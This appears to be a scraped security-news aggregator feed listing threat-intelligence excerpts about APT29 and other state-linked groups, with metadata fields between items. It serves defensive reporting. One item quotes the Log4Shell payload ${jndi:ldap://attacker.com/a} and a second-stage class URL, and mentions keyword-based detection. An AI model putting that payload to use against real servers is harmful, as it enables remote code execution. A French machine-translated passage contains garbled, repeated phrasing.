Websites Linked to GRU Hackers,” Bellingcat Investigation Team, accessed February 24, 2022, published February 23, 2022, https://www.bellingcat.com/news/2022/02/23/attack-on-ukrainian-government-websites-linked-to-russian-gru-hackers/; Joe Tidy “​​Ukraine crisis: 'Wiper' discovered in latest cyber-attacks,” BBC News, accessed February 24, 2022, published February 24, 2022, https://www.bbc.com/news/technology-60500618. [2] “Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware,” The U.S. Department of the Treasury, accessed February 24, 2022, published December 5, 2019, https://home.treasury.gov/news/press-releases/sm845.]]> 2022-02-25T00:05:00+00:00 https://www.anomali.com/blog/anomali-threat-research-provides-russian-cyber-activity-dashboard www.secnews.physaphae.fr/article.php?IdArticle=4180205 False Threat,Guideline APT 29,APT 29,APT 28 None Fortinet ThreatSignal - Harware Vendor 2022-02-23T18:34:00+00:00 https://fortiguard.fortinet.com/threat-signal-report/4425 www.secnews.physaphae.fr/article.php?IdArticle=4175593 False Malware,Threat APT 29 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-02-09T02:46:33+00:00 https://thehackernews.com/2022/02/russian-apt-hackers-used-covid-19-lures.html www.secnews.physaphae.fr/article.php?IdArticle=4098768 False Threat APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New CapraRAT Android Malware Targets Indian Government and Military Personnel (published: February 7, 2022) Trend Micro researchers have discovered a new remote access trojan (RAT) dubbed, CapraRAT, that targets Android systems. CapraRAT is attributed to the advanced persistent threat (APT) group, APT36 (Earth Karkaddan, Mythic Leopard, Transparent Tribe), which is believed to be Pakistan-based group that has been active since at least 2016. The Android-targeting CapraRAT shares similarities (capabilities, commands, and function names) to the Windows targeting Crimson RAT, and researchers note that it may be a modified version of the open source AndroRAT. The delivery method of CapraRAT is unknown, however, APT36 is known to use spearphishing emails with attachments or links. Once CapraRAT is installed and executed it will attempt to reach out to a command and control server and subsequently begin stealing various data from an infected device. Analyst Comment: It is important to only use the Google Play Store to obtain your software (for Android users), and avoid installing software from unverified sources because it is easier for malicious applications to get into third-party stores. Applications that ask for additional permissions outside of their normal functionality should be treated with suspicion, and normal functionality for the applications should be reviewed carefully prior to installation. Antivirus applications, if available, should be installed devices. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Software Deployment Tools - T1072 Tags: APT36, Earth Karkaddan, Mythic Leopard, Transparent Tribe, Android, CapraRAT Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (published: February 3, 2022) The Russia-sponsored, cyberespionage group Primitive Bear (Gamaredon) has continued updating its toolset, according to Unit 42 researchers. The group continues to use their primary tactic in spearphishing emails with attachments that leverage remote templates and template injection with a focus on Ukraine. These email attachments are usually Microsoft Word documents that use the remote template to fetch VBScript, execute it to establish persistence, and wait for the group’s instruction via a command and control server. Unit 42 researchers have analyzed the group’s activity and infrastructure dating back to 2018 up to the current border tensions between Russia and Ukraine. The infrastructure behind the campaigns is robust, with clusters of domains that are rotated and parked on different IPs, often on a daily basis. Analyst Comment: Spearphishing emails represent a significant security risk because the sending email will often appear legitimate to the target; sometimes a target company email is compromis]]> 2022-02-08T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-conti-ransomware-attack-iran-sponsored-apts-new-android-rat-russia-sponsored-gamaredon-and-more www.secnews.physaphae.fr/article.php?IdArticle=4094313 False Ransomware,Malware,Threat,Conference APT 35,APT 35,APT 29,APT 29,APT 36 2.0000000000000000 Bleeping Computer - Magazine Américain 2022-01-27T09:23:25+00:00 https://www.bleepingcomputer.com/news/security/russian-apt29-hackers-stealthy-malware-undetected-for-years/ www.secnews.physaphae.fr/article.php?IdArticle=4041393 False Malware APT 29 None CrowdStrike - CTI Society 2022-01-27T08:00:06+00:00 https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/ www.secnews.physaphae.fr/article.php?IdArticle=4040759 False None APT 29,APT 29,Solardwinds,Solardwinds None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Earth Lusca Employs Sophisticated Infrastructure, Varied Tools and Techniques (published: January 17, 2022) The Earth Lusca threat group is part of the Winnti cluster. It is one of different Chinese groups that share aspects of their tactics, techniques, and procedures (TTPs) including the use of Winnti malware. Earth Lusca were active throughout 2021 committing both cyberespionage operations against government-connected organizations and financially-motivated intrusions targeting gambling and cryptocurrency-related sectors. For intrusion, the group tries different ways in including: spearphishing, watering hole attacks, and exploiting publicly facing servers. Cobalt Strike is one of the group’s preferred post-exploitation tools. It is followed by the use of the BioPass RAT, the Doraemon backdoor, the FunnySwitch backdoor, ShadowPad, and Winnti. The group employs two separate infrastructure clusters, first one is rented Vultr VPS servers used for command-and-control (C2), second one is compromised web servers used to scan for vulnerabilities, tunnel traffic, and Cobalt Strike C2. Analyst Comment: Earth Lusca often relies on tried-and-true techniques that can be stopped by security best practices, such as avoiding clicking on suspicious email/website links and or reacting on random banners urging to update important public-facing applications. Don’t be tricked to download Adobe Flash update, it was discontinued at the end of December 2020. Administrators should keep their important public-facing applications (such as Microsoft Exchange and Oracle GlassFish Server) updated. MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] BITS Jobs - T1197 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hijack Execution Flow]]> 2022-01-19T22:45:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russia-sponsored-cyber-threats-china-based-earth-lusca-active-in-cyberespionage-and-cybertheft-bluenoroff-hunts-cryptocurrency-related-businesses-and-more www.secnews.physaphae.fr/article.php?IdArticle=3999162 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching,Guideline APT 38,APT 29,APT 28,APT 28,APT 41 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code. Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1]]> 2021-12-15T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apache-log4j-zero-day-exploit-google-fighting-glupteba-botnet-vixen-panda-targets-latin-america-and-europe-and-more www.secnews.physaphae.fr/article.php?IdArticle=3800465 False Malware,Tool,Vulnerability,Threat,Cloud APT 29,APT 25,APT 37,APT 15,APT 15 None Security Affairs - Blog Secu 2021-12-07T07:54:37+00:00 https://securityaffairs.co/wordpress/125352/apt/nobelium-custom-malware.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-custom-malware www.secnews.physaphae.fr/article.php?IdArticle=3755876 False Malware,Threat APT 29 None Security Affairs - Blog Secu 2021-12-06T22:31:02+00:00 https://securityaffairs.co/wordpress/125342/apt/nobelium-targets-french-orgs.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-targets-french-orgs www.secnews.physaphae.fr/article.php?IdArticle=3754433 False None APT 29 None Mandiant - Blog Sécu de Mandiant fusionné unc2452 avec apt29 .L'activité UNC2452 décrite dans ce post est désormais attribuée à APT29. comme anniversaire d'un an de la découverte du Chaîne d'approvisionnement Solarwinds Passe de compromis, mandiant reste engagé à être engagé à être engagé à être engagé à engagerSuivre l'un des acteurs les plus difficiles que nous ayons rencontrés.Ces acteurs russes présumés pratiquent la sécurité opérationnelle de premier ordre et les métiers avancés.Cependant, ils sont faillibles et nous continuons à découvrir leur activité et à apprendre de leurs erreurs.En fin de compte, ils restent une menace adaptable et évolutive qui doit être étroitement étudiée par

---

UPDATE (May 2022): We have merged UNC2452 with APT29. The UNC2452 activity described in this post is now attributed to APT29. As the one-year anniversary of the discovery of the SolarWinds supply chain compromise passes, Mandiant remains committed to tracking one of the toughest actors we have encountered. These suspected Russian actors practice top-notch operational security and advanced tradecraft. However, they are fallible, and we continue to uncover their activity and learn from their mistakes. Ultimately, they remain an adaptable and evolving threat that must be closely studied by]]> 2021-12-06T10:00:00+00:00 https://www.mandiant.com/resources/blog/russian-targeting-gov-business www.secnews.physaphae.fr/article.php?IdArticle=8377522 False Threat APT 29,Solardwinds 3.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence BlackMatter: New Data Exfiltration Tool Used in Attacks (published: November 1, 2021) Symantec researchers have discovered a custom data exfiltration tool, dubbed Exmatter, being used by the BlackMatter ransomware group. The same group has also been responsible for the Darkside ransomware - the variant that led to the May 2021 Colonial Pipeline outage. Exmatter is compiled as a .NET executable and obfuscated. This tool is designed to steal sensitive data and upload it to an attacker-controlled server prior to deployment of the ransomware as fast as possible. The speed is achieved via multiple filtering mechanisms: directory exclusion list, filetype whitelist, excluding files under 1,024 bytes, excluding files with certain attributes, and filename string exclusion list. Exmatter is being actively developed as three newer versions were found in the wild. Analyst Comment: Exmatter exfiltration tool by BlackMatter is following two custom data exfiltration tools linked to the LockBit ransomware operation. Attackers try to narrow down data sources to only those deemed most profitable or business-critical to speed up the whole exfiltration process. It makes it even more crucial for defenders to be prepared to quickly stop any detected exfiltration operation. MITRE ATT&CK: [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048 Tags: Exmatter, BlackMatter, Darkside, Ransomware, Exfiltration, Data loss prevention Iran Says Israel, U.S. Likely Behind Cyberattack on Gas Stations (published: October 31, 2021) Iranian General Gholamreza Jalali, head of Iran’s passive defense organization, went to state-run television to blame Israel and the U.S. for an October 26, 2021 cyberattack that paralyzed gasoline stations across the country. The attack on the fuel distribution chain in Iran forced the shutdown of a network of filling stations. The incident disabled government-issued electronic cards providing subsidies that tens of millions of Iranians use to purchase fuel at discounted prices. Jalali said the attack bore similarities to cyber strikes on Iran’s rail network and the Shahid Rajaee port. The latest attack displayed a message reading "cyberattack 64411" on gas pumps when people tried to use their subsidy cards. Similarly, in July 2021, attackers targeting Iranian railroad prompted victims to call 64411, the phone number for the office of Supreme Leader Ali Khamenei. Analyst Comment: Iran has not provided evidence behind the attribution, so]]> 2021-11-02T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russian-intelligence-targets-it-providers-malspam-abuses-squid-games-another-npm-library-compromise-and-more www.secnews.physaphae.fr/article.php?IdArticle=3598623 False Ransomware,Malware,Tool,Threat,Guideline APT 29,APT 29 None Security Affairs - Blog Secu 2021-10-25T11:41:33+00:00 https://securityaffairs.co/wordpress/123754/apt/nobelium-apt-it-supply-chain.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-apt-it-supply-chain www.secnews.physaphae.fr/article.php?IdArticle=3559032 False None APT 29 None